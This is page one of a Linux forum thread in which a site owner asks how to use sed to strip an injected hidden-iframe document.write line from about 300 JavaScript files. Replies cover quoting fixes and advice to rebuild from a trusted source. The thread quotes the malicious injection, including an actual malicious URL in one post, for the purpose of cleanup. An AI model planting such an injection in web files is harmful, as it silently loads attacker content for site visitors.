Find the answer to your Linux question:
Page 1 of 2 1 2 LastLast
Results 1 to 10 of 16
Hi all, this is what I'm trying for two days now. The code below was injected into about 300 . js -files on my website. I got a list of ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8

    The sed challenge - trying to clean up code injection


    Hi all,

    this is what I'm trying for two days now.

    The code below was injected into about 300 .js-files on my website. I got a list of infected files, I got a linux box, but Im lacking the skill. All the internet couldn't be of any help so far.

    Code:
    ;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="a-url-that-i can-not-post"></iframe>');
    My script reads the file names form a list and applies the sed-command. So the main challenge as I see it is to escape the single and double quotes. I failed so far to make a sed statement work.

    Please help, I'm really desperate and reall don't want to do it all manually. Thank you all in advance!

  2. #2
    Linux Newbie
    Join Date
    Mar 2010
    Posts
    152
    This thread looks like it has the right idea.
    Programming and other random guff: cat /dev/thoughts > blogspot.com (previously prognix.blogspot.com)

  3. #3
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    Thank you for your answer. Been there already and couldn't get my head around it. Yet, I'll give it another try. Nevertheless, any help help is appreciated.

  4. #4
    Trusted Penguin Irithori's Avatar
    Join Date
    May 2009
    Location
    Munich
    Posts
    3,387
    The problem with a compromised host is, that you dont know for sure what else has been modified.
    So I would suggest a reinstall of the machine and a new deploy of this website from a trusted source: ie backup or revision control.
    You must always face the curtain with a bow.

  5. #5
    Linux Newbie
    Join Date
    Nov 2012
    Posts
    224
    hi,

    as you can't efficiently escape single quote , go with double quotes, and escape them in the pattern
    Code:
    sed "s/some\"expressions\" have 'got' double quotes/substitution/" file1 file2 file_n

  6. #6
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    Basically you're right and i share your opinion. The website is hosted by a provider and i have only confixx access, so all i could do is a complete Joomla install. Still trying to avoid this...

  7. #7
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    Ok, this is what I've tried (for the 103rd time, I guess...)

    Code:
    sed "d/;document\.write\('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:some url"><\/iframe>'\);/g"
    Error message in terminal:
    sed: -e Ausdruck #1, Zeichen 2: Zusätzliche Zeichen nach dem Befehl

    which translates into:
    sed: -e expression #1, Character 2: Additional Characters trailing the command

    Any ideas welcome!

  8. #8
    Linux Newbie
    Join Date
    Nov 2012
    Posts
    224
    d goes at the end,
    g is useless,
    parenthesis should not be escaped.

  9. #9
    Just Joined!
    Join Date
    Mar 2004
    Location
    Munich
    Posts
    8
    This is the edited codeline, according to your suggestion:

    Code:
    sed "/;document\.write('<iframe width=\"50\" height=\"50\" style=\"width:100px;height:100px;position:absolute;left:-100px;top:0;\" src=\"http:\/\/hsuvmht\.freewww\.info\/55965feab821e9e8815792a6d42f565c\.cgi\?8\"><\/iframe>');/d"
    It runs without error, and also without the desired result. The pattern seems not to match. Still too many escapes?

  10. #10
    drl
    drl is offline
    Linux Engineer drl's Avatar
    Join Date
    Apr 2006
    Location
    Saint Paul, MN, USA / CentOS, Debian, Slackware, {Free, Open, Net}BSD, Solaris
    Posts
    1,287
    Hi.

    The shell interprets many special characters. So when sed/awk/perl program-commands are coded on the command line, misery with quoting often ensues.

    If I were doing this, I would place the commands in a separate file and have sed/awk/perl read the file of commands without the shell intervention. For sed, see the man page and read about option -f, then experiment.

    Best wishes ... cheers, drl
    Welcome - get the most out of the forum by reading forum basics and guidelines: click here.
    90% of questions can be answered by using man pages, Quick Search, Advanced Search, Google search, Wikipedia.
    We look forward to helping you with the challenge of the other 10%.
    ( Mn, 2.6.n, AMD-64 3000+, ASUS A8V Deluxe, 1 GB, SATA + IDE, Matrox G400 AGP )

Page 1 of 2 1 2 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •